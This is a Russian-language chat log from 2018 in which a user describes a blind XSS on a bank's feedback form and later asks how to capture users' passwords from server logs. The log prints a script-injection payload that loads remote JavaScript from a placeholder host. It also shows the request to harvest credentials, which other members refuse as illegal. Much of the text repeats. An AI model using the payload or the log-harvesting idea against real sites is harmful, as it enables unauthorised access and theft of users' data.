V
Ват?
Size: a a a
2018 March 05
SJ
это было бы крайне странно
M
Уязвимость на сайте Альфабанка https://tjournal.ru/67199-na-habrahabre-obvinili-alfastrahovanie-v-raskrytii-personalnyh-dannyh-v-kompanii-nazvali-eto-edinichnym-sboem
К слову, на сайте alfabank.ru всё очень худо с безопасностью. Несколько месяцев назад обнаружил у них на главной странице в обратной связи Blind XSS. Суть вот в чём - я присылаю им </script><script src=https://site.com/a.js?> в имени пользователя, и у них в админ панели выполняется этот js код. Можно просматривать в логах сообщения пользователей и их email адреса, а так же получить доступ к управлению сайтом. Для того, чтобы получить доступ к админке, не обязательно воровать куки, можно просто в логах посмотреть логин и пароль админа в открытом виде.
Пруф(небольшой кусок исходного кода в логах) https://pastebin.com/kxttDwTE . Это всего лишь малая часть всех пользователей,- всего за один заход можно прочитать 400 сообщений и украсть 400 email адресов.
Я не уважаю администрацию alfabank, но с уважением отношусь к их пользователям, поэтому я скрыл фамилии, email адреса юзеров, а также айпи, логин и пароль админа.
После обнаружения уязвимости отписал им в обратной связи, сам в логах увидел, что они прочитали моё сообщение(они перешли в переписку со мной и выполнили мой js) и намеренно игнорируют. Подождал немного,- вдруг захотят ответить или хотя бы устранить критическую уязвимость, но, увы, никто не ответил. В итоге раскрыл публично эту уязвимость на своём twitter и упомянул их. Через полчаса написали, что баг устранили, но даже элементарного «спасибо» я так и не дождался.
К слову, на сайте alfabank.ru всё очень худо с безопасностью. Несколько месяцев назад обнаружил у них на главной странице в обратной связи Blind XSS. Суть вот в чём - я присылаю им </script><script src=https://site.com/a.js?> в имени пользователя, и у них в админ панели выполняется этот js код. Можно просматривать в логах сообщения пользователей и их email адреса, а так же получить доступ к управлению сайтом. Для того, чтобы получить доступ к админке, не обязательно воровать куки, можно просто в логах посмотреть логин и пароль админа в открытом виде.
Пруф(небольшой кусок исходного кода в логах) https://pastebin.com/kxttDwTE . Это всего лишь малая часть всех пользователей,- всего за один заход можно прочитать 400 сообщений и украсть 400 email адресов.
Я не уважаю администрацию alfabank, но с уважением отношусь к их пользователям, поэтому я скрыл фамилии, email адреса юзеров, а также айпи, логин и пароль админа.
После обнаружения уязвимости отписал им в обратной связи, сам в логах увидел, что они прочитали моё сообщение(они перешли в переписку со мной и выполнили мой js) и намеренно игнорируют. Подождал немного,- вдруг захотят ответить или хотя бы устранить критическую уязвимость, но, увы, никто не ответил. В итоге раскрыл публично эту уязвимость на своём twitter и упомянул их. Через полчаса написали, что баг устранили, но даже элементарного «спасибо» я так и не дождался.
NT
Уязвимость на сайте Альфабанка https://tjournal.ru/67199-na-habrahabre-obvinili-alfastrahovanie-v-raskrytii-personalnyh-dannyh-v-kompanii-nazvali-eto-edinichnym-sboem
К слову, на сайте alfabank.ru всё очень худо с безопасностью. Несколько месяцев назад обнаружил у них на главной странице в обратной связи Blind XSS. Суть вот в чём - я присылаю им </script><script src=https://site.com/a.js?> в имени пользователя, и у них в админ панели выполняется этот js код. Можно просматривать в логах сообщения пользователей и их email адреса, а так же получить доступ к управлению сайтом. Для того, чтобы получить доступ к админке, не обязательно воровать куки, можно просто в логах посмотреть логин и пароль админа в открытом виде.
Пруф(небольшой кусок исходного кода в логах) https://pastebin.com/kxttDwTE . Это всего лишь малая часть всех пользователей,- всего за один заход можно прочитать 400 сообщений и украсть 400 email адресов.
Я не уважаю администрацию alfabank, но с уважением отношусь к их пользователям, поэтому я скрыл фамилии, email адреса юзеров, а также айпи, логин и пароль админа.
После обнаружения уязвимости отписал им в обратной связи, сам в логах увидел, что они прочитали моё сообщение(они перешли в переписку со мной и выполнили мой js) и намеренно игнорируют. Подождал немного,- вдруг захотят ответить или хотя бы устранить критическую уязвимость, но, увы, никто не ответил. В итоге раскрыл публично эту уязвимость на своём twitter и упомянул их. Через полчаса написали, что баг устранили, но даже элементарного «спасибо» я так и не дождался.
К слову, на сайте alfabank.ru всё очень худо с безопасностью. Несколько месяцев назад обнаружил у них на главной странице в обратной связи Blind XSS. Суть вот в чём - я присылаю им </script><script src=https://site.com/a.js?> в имени пользователя, и у них в админ панели выполняется этот js код. Можно просматривать в логах сообщения пользователей и их email адреса, а так же получить доступ к управлению сайтом. Для того, чтобы получить доступ к админке, не обязательно воровать куки, можно просто в логах посмотреть логин и пароль админа в открытом виде.
Пруф(небольшой кусок исходного кода в логах) https://pastebin.com/kxttDwTE . Это всего лишь малая часть всех пользователей,- всего за один заход можно прочитать 400 сообщений и украсть 400 email адресов.
Я не уважаю администрацию alfabank, но с уважением отношусь к их пользователям, поэтому я скрыл фамилии, email адреса юзеров, а также айпи, логин и пароль админа.
После обнаружения уязвимости отписал им в обратной связи, сам в логах увидел, что они прочитали моё сообщение(они перешли в переписку со мной и выполнили мой js) и намеренно игнорируют. Подождал немного,- вдруг захотят ответить или хотя бы устранить критическую уязвимость, но, увы, никто не ответил. В итоге раскрыл публично эту уязвимость на своём twitter и упомянул их. Через полчаса написали, что баг устранили, но даже элементарного «спасибо» я так и не дождался.
Я когда деньги переводил, находил у них XSS, которая была тупо в строке Reflected 😐
При чем с обходом XSS аудитора, отрепортил им, не была пофикшена месяц назад, да и сейчас наверное не пофикшена
При чем с обходом XSS аудитора, отрепортил им, не была пофикшена месяц назад, да и сейчас наверное не пофикшена
NT
Кстати тоже с </script>
2018 March 06
MA
Ребята, есть ли члены программного комитета PHDays, готовые ответить на 2 маленьких вопросика? Или посоветуете сразу на почту писать, быстро отвечают?
d
Могу ошибаться, но тут вроде только бывшие :)
AS
могу переадресовать
M
Раскручиваю одну уязвимость, кто-то подскажет, как при http авторизации получить в логах логин и пароль, которые пытался ввести пользователь? В logs/error.log смог получить только логин при не успешном аутче, который пытался ввести юзер, но парол не смог получить
SJ
У тебя есть возможность читать error.log?
К
У тебя есть возможность читать error.log?
не отвечай ему, а то зашкваришься
SJ
не отвечай ему, а то зашкваришься
а что он?
SJ
Не хочу помогать в чем-то противозаконном :-)
К
а что он?
Стрёмный тип. Сливает базы пользователей и копается в конфиденциальных данных только чтобы показать сервисам насколько всё плохо и получить побольше выплаты
M
Стрёмный тип. Сливает базы пользователей и копается в конфиденциальных данных только чтобы показать сервисам насколько всё плохо и получить побольше выплаты
ты не думал, что я делаю это также для того, помочь сделать сайт безопаснее? иногда мне не платят, но я всё равно помогаю устранять баги, как и многие вайт хеты, ну тебе не понять
M
и это, кстати, уязвимость в телеграме, так что, можно сказать, что я помогаю пользователям телеграма, и тебе тоже
M
У тебя есть возможность читать error.log?
да, называется так site.com.error.log
К
ты не думал, что я делаю это также для того, помочь сделать сайт безопаснее? иногда мне не платят, но я всё равно помогаю устранять баги, как и многие вайт хеты, ну тебе не понять
Но это закон нарушает. Ты можешь просто сказать что вот у вас бага, вот могут доступ к базе получить
К
Не нужно при этом сливать данные всех юзеров
M
Но это закон нарушает. Ты можешь просто сказать что вот у вас бага, вот могут доступ к базе получить
По-разному, я редко когда это делаю. Но есть такие компании, которые оправдываются и говорят потом, что нельзя было получить с помощью этой баги доступ к бд и тд, нужно же доказательство. Всегда после того, как зарепортил, я удаляю базу